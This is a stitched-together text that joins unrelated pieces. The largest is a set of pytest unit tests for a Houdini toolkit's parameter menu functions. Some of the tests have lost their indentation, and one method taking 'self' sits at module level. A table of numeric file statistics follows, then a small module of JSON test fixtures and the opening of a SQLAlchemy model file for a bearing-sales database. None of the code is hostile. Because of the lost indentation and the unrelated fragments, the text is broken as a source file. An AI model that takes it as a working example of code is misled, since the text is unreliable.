        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        # A bare MagicMock(spec=str) has a default __len__ of 0, so the
        # evaluated path reads as empty and validation bails out early.
        mock_parm.eval.return_value = mocker.MagicMock(spec=str)
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)

        assert not result
        # Empty path: rejected before any keyframe inspection.
        mock_parm.keyframes.assert_not_called()

    def test_not_relative(self, mocker):
        """Test when the path does not seem to be relative."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = False  # does not start with ".."

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)

        assert not result
        mock_path.startswith.assert_called_with("..")
        mock_parm.keyframes.assert_not_called()

    def test_keyframes(self, mocker):
        """Test when the parameter has keyframes."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = True

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        # keyframes() is deliberately left unconfigured: the default MagicMock
        # return value is truthy, so the parm appears to have keyframes.
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)

        assert not result
        mock_path.startswith.assert_called_with("..")
        mock_parm.keyframes.assert_called()
        mock_parm.unexpandedString.assert_not_called()

    def test(self, mocker):
        """Test when the path can be converted to an absolute path."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = True

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        mock_parm.keyframes.return_value = ()  # no keyframes
        # Unexpanded string matches the evaluated path -> not an expression.
        mock_parm.unexpandedString.return_value = mock_path
        mock_parm.parmTemplate.return_value = mock_template
        mock_parm.evalAsNode.return_value = mocker.MagicMock(spec=hou.Node)

        result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)

        assert result
        mock_path.startswith.assert_called_with("..")
        mock_parm.keyframes.assert_called()
        mock_parm.evalAsNode.assert_called()

    def test_invalid_path(self, mocker):
        """Test when the path does not point to a valid node."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = True

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        mock_parm.keyframes.return_value = ()
        mock_parm.unexpandedString.return_value = mock_path
        mock_parm.parmTemplate.return_value = mock_template
        mock_parm.evalAsNode.return_value = None  # path resolves to no node

        result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)

        assert not result
        mock_path.startswith.assert_called_with("..")
        mock_parm.keyframes.assert_called()
        mock_parm.evalAsNode.assert_called()

    def test_expression(self, mocker):
        """Test when the path does not match the unexpanded string (is an expression)."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = True

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        mock_parm.keyframes.return_value = ()
        # Different object than mock_path -> evaluated and raw strings differ,
        # i.e. the parm value is an expression.
        mock_parm.unexpandedString.return_value = mocker.MagicMock(spec=str)
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)

        assert not result
        mock_path.startswith.assert_called_with("..")
        mock_parm.keyframes.assert_called()
        mock_parm.evalAsNode.assert_not_called()

    def test_not_node_reference(self, mocker):
        """Test when the string parameter is not a node reference."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        # Some string type other than NodeReference.
        mock_template.stringType.return_value = mocker.MagicMock(
            spec=hou.stringParmType
        )

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)

        assert not result
        mock_parm.eval.assert_not_called()

    def test_not_string_parm(self, mocker):
        """Test when the string parameter is not a node reference."""
        # Plain ParmTemplate (not a StringParmTemplate) -> rejected outright.
        mock_template = mocker.MagicMock(spec=hou.ParmTemplate)

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)

        assert not result
class Test__valid_to_convert_to_relative_reference:
    """Test ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference."""

    def test_empty_string(self, mocker):
        """Test when the path is an empty string."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        # Bare MagicMock(spec=str): default __len__ is 0 -> empty path.
        mock_parm.eval.return_value = mocker.MagicMock(spec=str)
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)

        assert not result
        mock_parm.keyframes.assert_not_called()

    def test_not_absolute(self, mocker):
        """Test when the path does not seem to be absolute."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = False  # does not start with "/"

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)

        assert not result
        mock_path.startswith.assert_called_with("/")
        mock_parm.keyframes.assert_not_called()

    def test_keyframes(self, mocker):
        """Test when the parameter has keyframes."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = True

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        # keyframes() left unconfigured: default MagicMock return is truthy,
        # so the parm appears to have keyframes.
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)

        assert not result
        mock_path.startswith.assert_called_with("/")
        mock_parm.keyframes.assert_called()
        mock_parm.unexpandedString.assert_not_called()

    def test(self, mocker):
        """Test when the path can be converted to a relative path."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = True

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        mock_parm.keyframes.return_value = ()  # no keyframes
        # Same object as evaluated path -> not an expression.
        mock_parm.unexpandedString.return_value = mock_path
        mock_parm.parmTemplate.return_value = mock_template
        mock_parm.evalAsNode.return_value = mocker.MagicMock(spec=hou.Node)

        result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)

        assert result
        mock_path.startswith.assert_called_with("/")
        mock_parm.keyframes.assert_called()
        mock_parm.evalAsNode.assert_called()

    def test_invalid_path(self, mocker):
        """Test when the path does not point to a valid node."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = True

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        mock_parm.keyframes.return_value = ()
        mock_parm.unexpandedString.return_value = mock_path
        mock_parm.parmTemplate.return_value = mock_template
        mock_parm.evalAsNode.return_value = None  # path resolves to no node

        result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)

        assert not result
        mock_path.startswith.assert_called_with("/")
        mock_parm.keyframes.assert_called()
        mock_parm.evalAsNode.assert_called()

    def test_expression(self, mocker):
        """Test when the path does not match the unexpanded string (is an expression)."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        mock_template.stringType.return_value = hou.stringParmType.NodeReference

        mock_path = mocker.MagicMock(spec=str)
        mock_path.__len__.return_value = 1
        mock_path.startswith.return_value = True

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.eval.return_value = mock_path
        mock_parm.keyframes.return_value = ()
        # Distinct object -> raw and evaluated strings differ (expression).
        mock_parm.unexpandedString.return_value = mocker.MagicMock(spec=str)
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)

        assert not result
        mock_path.startswith.assert_called_with("/")
        mock_parm.keyframes.assert_called()
        mock_parm.evalAsNode.assert_not_called()

    def test_not_node_reference(self, mocker):
        """Test when the string parameter is not a node reference."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
        # Some string type other than NodeReference.
        mock_template.stringType.return_value = mocker.MagicMock(
            spec=hou.stringParmType
        )

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)

        assert not result
        mock_parm.eval.assert_not_called()

    def test_not_string_parm(self, mocker):
        """Test when the string parameter is not a node reference."""
        # Plain ParmTemplate (not a StringParmTemplate) -> rejected outright.
        mock_template = mocker.MagicMock(spec=hou.ParmTemplate)

        mock_parm = mocker.MagicMock(spec=hou.Parm)
        mock_parm.parmTemplate.return_value = mock_template

        result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)

        assert not result
class Test_convert_absolute_to_relative_path_context:
    """Test ht.ui.menus.parmmenu.convert_absolute_to_relative_path_context."""

    def test_none(self, mocker):
        """Test converting when no parms are suitable to convert."""
        patched_check = mocker.patch(
            "ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference",
            return_value=False,
        )

        first_parm = mocker.MagicMock(spec=hou.Parm)
        second_parm = mocker.MagicMock(spec=hou.Parm)

        outcome = ht.ui.menus.parmmenu.convert_absolute_to_relative_path_context(
            {"parms": (first_parm, second_parm)}
        )

        # Neither parm validates, so the context check is falsy, and both
        # parms were run through the validity predicate.
        assert not outcome
        patched_check.assert_has_calls(
            [mocker.call(first_parm), mocker.call(second_parm)]
        )

    def test_some(self, mocker):
        """Test converting when at least one parm is suitable to convert."""
        patched_check = mocker.patch(
            "ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference",
            side_effect=(False, True),
        )

        first_parm = mocker.MagicMock(spec=hou.Parm)
        second_parm = mocker.MagicMock(spec=hou.Parm)

        outcome = ht.ui.menus.parmmenu.convert_absolute_to_relative_path_context(
            {"parms": (first_parm, second_parm)}
        )

        # The second parm validates, so the context check is truthy.
        assert outcome
        patched_check.assert_has_calls(
            [mocker.call(first_parm), mocker.call(second_parm)]
        )
def test_convert_absolute_to_relative_path(mocker):
    """Test converting an absolute to relative path."""
    patched_check = mocker.patch(
        "ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference",
        side_effect=(False, True),
    )

    skipped_parm = mocker.MagicMock(spec=hou.Parm)
    converted_parm = mocker.MagicMock(spec=hou.Parm)

    ht.ui.menus.parmmenu.convert_absolute_to_relative_path(
        {"parms": (skipped_parm, converted_parm)}
    )

    patched_check.assert_has_calls(
        [mocker.call(skipped_parm), mocker.call(converted_parm)]
    )

    # Only the parm that passed validation was touched.
    skipped_parm.evalAsNode.assert_not_called()
    converted_parm.evalAsNode.assert_called()

    # The new value is the relative path from the parm's node to the target.
    converted_parm.set.assert_called_with(
        converted_parm.node.return_value.relativePathTo.return_value
    )
    converted_parm.node.return_value.relativePathTo.assert_called_with(
        converted_parm.evalAsNode.return_value
    )
class Test_convert_relative_to_absolute_path_context:
    """Test ht.ui.menus.parmmenu.convert_relative_to_absolute_path_context."""

    def test_none(self, mocker):
        """Test converting when no parms are suitable to convert."""
        patched_check = mocker.patch(
            "ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference",
            return_value=False,
        )

        first_parm = mocker.MagicMock(spec=hou.Parm)
        second_parm = mocker.MagicMock(spec=hou.Parm)

        outcome = ht.ui.menus.parmmenu.convert_relative_to_absolute_path_context(
            {"parms": (first_parm, second_parm)}
        )

        # No parm validates -> context check is falsy; both were checked.
        assert not outcome
        patched_check.assert_has_calls(
            [mocker.call(first_parm), mocker.call(second_parm)]
        )

    def test_some(self, mocker):
        """Test converting when at least one parm is suitable to convert."""
        patched_check = mocker.patch(
            "ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference",
            side_effect=(False, True),
        )

        first_parm = mocker.MagicMock(spec=hou.Parm)
        second_parm = mocker.MagicMock(spec=hou.Parm)

        outcome = ht.ui.menus.parmmenu.convert_relative_to_absolute_path_context(
            {"parms": (first_parm, second_parm)}
        )

        # One parm validates -> context check is truthy.
        assert outcome
        patched_check.assert_has_calls(
            [mocker.call(first_parm), mocker.call(second_parm)]
        )
def test_convert_relative_to_absolute_path(mocker):
    """Test ht.ui.menus.parmmenu.convert_relative_to_absolute_path."""
    patched_check = mocker.patch(
        "ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference",
        side_effect=(False, True),
    )

    skipped_parm = mocker.MagicMock(spec=hou.Parm)
    converted_parm = mocker.MagicMock(spec=hou.Parm)

    ht.ui.menus.parmmenu.convert_relative_to_absolute_path(
        {"parms": (skipped_parm, converted_parm)}
    )

    patched_check.assert_has_calls(
        [mocker.call(skipped_parm), mocker.call(converted_parm)]
    )

    # Only the parm that passed validation was touched; its new value is the
    # absolute path of the node the parm evaluates to.
    skipped_parm.evalAsNode.assert_not_called()
    converted_parm.evalAsNode.assert_called()
    converted_parm.set.assert_called_with(
        converted_parm.evalAsNode.return_value.path.return_value
    )
class Test_promote_parameter_to_node:
"""Test ht.ui.menus.parmmenu.promote_parameter_to_node."""
def test_target_is_source(self, mocker, mock_hou_ui):
"""Test when trying to promote to the node containing the parms to promote."""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.__len__.return_value = 1
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_hou_node.return_value = mock_node1
scriptargs = {"parms": (mock_parm1,)}
with pytest.raises(hou.OperationFailed):
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
def test_parm_exists_no_set(self, mocker, mock_hou_ui):
"""Test when the target exists and we don't want to set the target value to the
current value before promoting.
"""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.__len__.return_value = 1
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTuple.return_value = mocker.MagicMock(spec=hou.ParmTuple)
mock_target_node.parm.return_value = mock_target_parm1
mock_hou_node.return_value = mock_target_node
mock_hou_ui.displayMessage.return_value = 0
scriptargs = {"parms": (mock_parm1,)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_target_node.parm.assert_called_with(mock_parm1.name.return_value)
mock_target_parm1.set.assert_not_called()
mock_parm1.set.assert_called_with(mock_target_parm1)
def test_parm_exists_set_value(self, mocker, mock_hou_ui):
"""Test when the target exists and we want to set the target value to the current
value before promoting.
"""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.__len__.return_value = 1
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTuple.return_value = mocker.MagicMock(spec=hou.ParmTuple)
mock_target_node.parm.return_value = mock_target_parm1
mock_hou_node.return_value = mock_target_node
mock_hou_ui.displayMessage.return_value = 1
scriptargs = {"parms": (mock_parm1,)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_target_node.parm.assert_called_with(mock_parm1.name.return_value)
mock_target_parm1.set.assert_called_with(mock_parm1.eval.return_value)
mock_parm1.set.assert_called_with(mock_target_parm1)
def test_parm_exists_cancel(self, mocker, mock_hou_ui):
"""Test when the target exists and we want to cancel."""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.__len__.return_value = 1
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTuple.return_value = mocker.MagicMock(spec=hou.ParmTuple)
mock_target_node.parm.return_value = mock_target_parm1
mock_hou_node.return_value = mock_target_node
mock_hou_ui.displayMessage.return_value = 2
scriptargs = {"parms": (mock_parm1,)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_target_node.parm.assert_not_called()
def test_no_existing_single_component(self, mocker, mock_hou_ui):
"""Test when there is no existing parm and we want to promote a single parm from the tuple."""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_template1 = mocker.MagicMock(spec=hou.ParmTemplate)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.parmTemplate.return_value = mock_parm_template1
mock_parm_tuple1.__len__.return_value = 3
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_ptg = mocker.MagicMock(spec=hou.ParmTemplateGroup)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTemplateGroup.return_value = mock_ptg
mock_target_node.parmTuple.return_value = None
mock_target_node.parm.return_value = mock_target_parm1
mock_hou_node.return_value = mock_target_node
scriptargs = {"parms": (mock_parm1,)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_parm_template1.setNumComponents.assert_called_with(1)
mock_parm_template1.setName.assert_called_with(mock_parm1.name.return_value)
mock_ptg.addParmTemplate.assert_called_with(mock_parm_template1)
mock_target_node.setParmTemplateGroup.assert_called_with(mock_ptg)
mock_target_node.parm.assert_called_with(mock_parm1.name.return_value)
mock_target_parm1.set.assert_called_with(mock_parm1.eval.return_value)
mock_parm1.set.assert_called_with(mock_target_parm1)
def test_no_existing_multiple_components(self, mocker, mock_hou_ui):
"""Test when there is no existing parm and we want to promote a full tuple."""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_template1 = mocker.MagicMock(spec=hou.ParmTemplate)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.parmTemplate.return_value = mock_parm_template1
mock_parm_tuple1.__len__.return_value = 3
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_parm2 = mocker.MagicMock(spec=hou.Parm)
mock_parm2.tuple.return_value = mock_parm_tuple1
mock_parm3 = mocker.MagicMock(spec=hou.Parm)
mock_parm3.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_target_parm2 = mocker.MagicMock(spec=hou.Parm)
mock_target_parm3 = mocker.MagicMock(spec=hou.Parm)
mock_ptg = mocker.MagicMock(spec=hou.ParmTemplateGroup)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTemplateGroup.return_value = mock_ptg
mock_target_node.parmTuple.return_value = None
mock_target_node.parm.side_effect = (
mock_target_parm1,
mock_target_parm2,
mock_target_parm3,
)
mock_hou_node.return_value = mock_target_node
scriptargs = {"parms": (mock_parm1, mock_parm2, mock_parm3)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_parm_template1.setNumComponents.assert_not_called()
mock_ptg.addParmTemplate.assert_called_with(mock_parm_template1)
mock_target_node.setParmTemplateGroup.assert_called_with(mock_ptg)
mock_target_node.parm.assert_has_calls(
[
mocker.call(mock_parm1.name.return_value),
mocker.call(mock_parm2.name.return_value),
mocker.call(mock_parm3.name.return_value),
]
)
mock_target_parm1.set.assert_called_with(mock_parm1.eval.return_value)
mock_target_parm2.set.assert_called_with(mock_parm2.eval.return_value)
mock_target_parm3.set.assert_called_with(mock_parm3.eval.return_value)
mock_parm1.set.assert_called_with(mock_target_parm1)
def test_no_selection(self, mocker, mock_hou_ui):
    """Test when no target node is selected."""
    patched_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")

    source_node = mocker.MagicMock(spec=hou.Node)

    template = mocker.MagicMock(spec=hou.ParmTemplate)

    parm_tuple = mocker.MagicMock(spec=hou.ParmTuple)
    parm_tuple.parmTemplate.return_value = template
    parm_tuple.__len__.return_value = 3
    parm_tuple.node.return_value = source_node

    parm = mocker.MagicMock(spec=hou.Parm)
    parm.tuple.return_value = parm_tuple

    promoted_parm = mocker.MagicMock(spec=hou.Parm)

    template_group = mocker.MagicMock(spec=hou.ParmTemplateGroup)

    target_node = mocker.MagicMock(spec=hou.Node)
    target_node.parmTemplateGroup.return_value = template_group
    target_node.parmTuple.return_value = None
    target_node.parm.return_value = promoted_parm

    # Simulate the user cancelling the node chooser: hou.node() yields None.
    patched_hou_node.return_value = None

    scriptargs = {"parms": (parm,)}

    ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)

    # The chooser opens rooted at the source node's parent, and the selected
    # path is resolved through hou.node(); nothing further should happen.
    mock_hou_ui.selectNode.assert_called_with(
        initial_node=source_node.parent.return_value
    )
    patched_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
| 37.426938
| 102
| 0.706807
| 3,743
| 29,455
| 5.199305
| 0.037937
| 0.094394
| 0.105442
| 0.106264
| 0.963774
| 0.959714
| 0.943734
| 0.929911
| 0.922203
| 0.918298
| 0
| 0.008777
| 0.199287
| 29,455
| 786
| 103
| 37.474555
| 0.816366
| 0.083178
| 0
| 0.832323
| 0
| 0
| 0.024006
| 0.021019
| 0
| 0
| 0
| 0
| 0.214141
| 1
| 0.058586
| false
| 0
| 0.006061
| 0
| 0.074747
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
764ffb38c7242edada8a2b21e57682674b41250a
| 841
|
py
|
Python
|
server/testdata.py
|
msaunby/browser-png-float32
|
7bc35e8b3dee2425554f0efa4f693d0baa0f1b46
|
[
"Apache-2.0"
] | null | null | null |
server/testdata.py
|
msaunby/browser-png-float32
|
7bc35e8b3dee2425554f0efa4f693d0baa0f1b46
|
[
"Apache-2.0"
] | null | null | null |
server/testdata.py
|
msaunby/browser-png-float32
|
7bc35e8b3dee2425554f0efa4f693d0baa0f1b46
|
[
"Apache-2.0"
] | null | null | null |
# Test fixtures for the coverage-data server.
#
# Each constant is a JSON document with one "coverageData" entry holding a
# 3x3 grid of sample values.

# Values spanning the unsigned 8-bit range (0-255).
ubyte_small: str = """
{
"coverageData": [
{
"values": [
[
0,
127,
255
],
[
1,
128,
254
],
[
2,
129,
253
]
]
}]
}
"""
# Values up to 4095 (12-bit range), exceeding a single byte.
uint_small: str = """
{
"coverageData": [
{
"values": [
[
0,
127,
4095
],
[
1,
128,
4094
],
[
2,
129,
4093
]
]
}]
}
"""
# Floating-point values: negatives, large magnitudes, and sub-unit fractions.
float_small: str = """
{
"coverageData": [
{
"values": [
[
0,
5,
-3
],
[
1000000,
10000,
-100
],
[
0.00001,
0.001,
-0.1
]
]
}]
}
"""
| 10.782051
| 19
| 0.191439
| 42
| 841
| 3.761905
| 0.595238
| 0.322785
| 0.436709
| 0.455696
| 0.341772
| 0
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 0.673008
| 841
| 77
| 20
| 10.922078
| 0.301818
| 0
| 0
| 0.430556
| 0
| 0
| 0.920048
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
769df70e79af76d3bd73ebfbc1da84ddb431a749
| 47,223
|
py
|
Python
|
app_backend/models/model_bearing.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 1
|
2020-06-21T04:08:26.000Z
|
2020-06-21T04:08:26.000Z
|
app_backend/models/model_bearing.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 13
|
2019-10-18T17:19:32.000Z
|
2022-01-13T00:44:43.000Z
|
app_backend/models/model_bearing.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 5
|
2019-02-07T03:15:16.000Z
|
2021-09-04T14:06:28.000Z
|
# coding: utf-8
from sqlalchemy import Column, Date, DateTime, Index, Integer, Numeric, String, text
from app_backend.databases.bearing import db_bearing
# Declarative base class provided by the 'bearing' Flask-SQLAlchemy database.
Base = db_bearing.Model
metadata = Base.metadata
def to_dict(self):
    """Serialize a mapped instance to a plain dict, one entry per table column.

    Columns with no corresponding instance attribute map to ``None``.
    """
    result = {}
    for column in self.__table__.columns:
        result[column.name] = getattr(self, column.name, None)
    return result
# Attach the serializer to every model class and bind all models to the
# 'bearing' database (Flask-SQLAlchemy multi-database binds).
Base.to_dict = to_dict
Base.__bind_key__ = 'bearing'
class AccountPayment(Base):
    """ORM model for table ``account_payment``."""
    __tablename__ = 'account_payment'

    id = Column(Integer, primary_key=True)
    uid = Column(Integer, nullable=False, server_default=text("'0'"))
    supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_ticket = Column(Integer, nullable=False, server_default=text("'0'"))
    type_account = Column(Integer, nullable=False, server_default=text("'0'"))
    amount = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
